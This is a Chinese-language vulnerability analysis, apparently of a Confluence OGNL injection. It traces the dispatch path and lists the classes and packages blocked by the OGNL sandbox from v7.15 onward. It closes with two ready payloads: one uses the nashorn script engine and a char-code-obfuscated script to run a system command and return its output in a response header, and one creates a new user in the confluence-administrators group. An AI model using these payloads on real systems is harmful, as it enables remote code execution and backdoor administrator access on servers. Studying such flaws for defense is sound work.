移除了 com.opensymphony.xwork.util.TextParseUtil#translateVariables 的调用；跟进这个函数，发现这里就是 OGNL 表达式的执行点。
然后走到 com.atlassian.confluence.servlet.ConfluenceServletDispatcher#serviceAction。ConfluenceServletDispatcher 是 ServletDispatcher 的子类。
在 serviceAction 中先调用 createActionProxy 创建一个代理对象，然后调用代理对象的 execute 函数。在代理对象中，我们的 payload 保存在 namespace 字段里，随后代理对象将自身（this）传递给 interceptor.intercept(this)。以 com.opensymphony.xwork.interceptor.AroundInterceptor 拦截器为例，它仍会调用 invocation.invoke()。
其中 notpermitted 对应的 result 类为 com.opensymphony.xwork.ActionChainResult，所以会进入 com.opensymphony.xwork.ActionChainResult#execute。
从 v7.15 开始，Confluence 在解析 OGNL 表达式时加入了沙箱设置：在 com.opensymphony.xwork.util.TextParseUtil#translateVariables 中调用 OGNL 时使用的是 findValue。
1sun.misc.Unsafe
2classLoader
3java.lang.System
4java.lang.ThreadGroup
5com.opensymphony.xwork.ActionContext java.lang.Compiler
6com.atlassian.applinks.api.ApplicationLinkRequestFactory
7java.lang.Thread
8com.atlassian.core.util.ClassLoaderUtils
9java.lang.ProcessBuilder
10java.lang.InheritableThreadLocal
11com.atlassian.core.util.ClassHelper
12class
13java.lang.Shutdown
14java.lang.ThreadLocal
15java.lang.Process
16java.lang.Package
17org.apache.tomcat.InstanceManager
18java.lang.Runtime
19javax.script.ScriptEngineManager
20javax.persistence.EntityManager
21org.springframework.context.ApplicationContext
22java.lang.SecurityManager
23java.lang.Object
24java.lang.Class
25java.lang.RuntimePermission
26javax.servlet.ServletContext
27java.lang.ClassLoader
28java.rmi
29sun.management
30org.apache.catalina.session
31java.jms
32com.atlassian.confluence.util.io
33com.google.common.reflect
34javax.sql
35java.nio
36com.atlassian.sal.api.net
37sun.invoke
38java.util.zip
39liquibase
40com.hazelcast
41org.apache.commons.httpclient
42com.atlassian.util.concurrent
43java.net
44freemarker.ext.jsp
45com.sun.jna
46net.java.ao
47javax
48sun.corba
49org.springframework.util.concurrent
50com.sun.jmx
51sun.misc
52javassist
53ognl
54org.apache.commons.exec
55com.atlassian.cache
56org.wildfly.extension.undertow.deployment java.lang.reflect
57io.atlassian.util.concurrent
58java.util.concurrent
59com.atlassian.confluence.util.http
60sun.tracing
61org.objectweb.asm
62freemarker.template
63net.sf.hibernate
64freemarker.core
65net.bytebuddy
66org.apache.tomcat
67freemarker.ext.rhino
68com.atlassian.media
69org.springframework.context
70org.apache.velocity
71javax.xml
72java.sql
73sun.reflect
74sun.net
75javax.persistence
76org.javassist
77javax.naming
78org.apache.httpcomponents.httpclient
79com.atlassian.hibernate
80sun.nio
81com.atlassian.confluence.impl.util.sandbox
82com.google.common.net
83com.atlassian.filestore
84org.apache.commons.io
85com.atlassian.vcache
86jdk.nashorn
87sun.launcher
88oshi
89org.apache.bcel
90sun.rmi
91sun.tools.jar
92org.springframework.expression.spel
93com.opensymphony.xwork.util
94org.ow2.asm
95com.atlassian.confluence.setup.bandana
96org.quartz
97net.sf.cglib
98com.atlassian.activeobjects
99com.atlassian.utils.process
100sun.security
101com.atlassian.quartz
102javax.management
103sun.awt.shell
104com.google.common.cache
105org.apache.http.client
106java.io
107com.atlassian.confluence.util.sandbox
108java.util.jar
109com.atlassian.scheduler
110sun.print
111com.atlassian.failurecache
112com.google.common.io
113org.apache.catalina.core
114org.ehcache
115getClass
116getClassLoader
1net.sf.hibernate.proxy.HibernateProxy
2java.lang.reflect.Proxy
3net.java.ao.EntityProxyAccessor
4net.java.ao.RawEntity
5net.sf.cglib.proxy.Factory
6java.io.ObjectInputValidation
7net.java.ao.Entity
8com.atlassian.confluence.util.GeneralUtil
9java.io.Serializable
1${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("X-CMD",Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,105,100,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,115))"))}
1redirect com.atlassian.confluence.xwork.RedirectResult
2loginrequired com.atlassian.confluence.xwork.RedirectResult
3notsetup com.atlassian.confluence.xwork.RedirectResult
4notpermittedpersonal com.opensymphony.xwork.ActionChainResult
5forward com.opensymphony.webwork.dispatcher.ServletDispatcherResult
6websudorequired com.atlassian.confluence.xwork.RedirectResult
7atom03 com.atlassian.xwork.results.RssResult
8rss1 com.atlassian.xwork.results.RssResult
9httpmethodnotallowed com.opensymphony.webwork.dispatcher.HttpHeaderResult
10atom10 com.atlassian.xwork.results.RssResult
11licenseexpired com.atlassian.confluence.setup.webwork.EncodingVelocityResult
12rss com.atlassian.xwork.results.RssResult
13readonly com.opensymphony.xwork.ActionChainResult
14notpermitted com.opensymphony.xwork.ActionChainResult
15rss2 com.atlassian.xwork.results.RssResult
16notfound com.opensymphony.xwork.ActionChainResult
17invalidmethod com.opensymphony.webwork.dispatcher.HttpHeaderResult
18licenseusersexceeded com.atlassian.confluence.setup.webwork.EncodingVelocityResult
19alreadysetup com.atlassian.confluence.setup.webwork.EncodingVelocityResult
20pagenotfound com.opensymphony.webwork.dispatcher.ServletDispatcherResult
21atom com.atlassian.xwork.results.RssResult
1${#this.getUserAccessor().addUser('test','test@1234','test@gmail.com','Test',@[email protected]ing("confluence-administrators,confluence-users"))}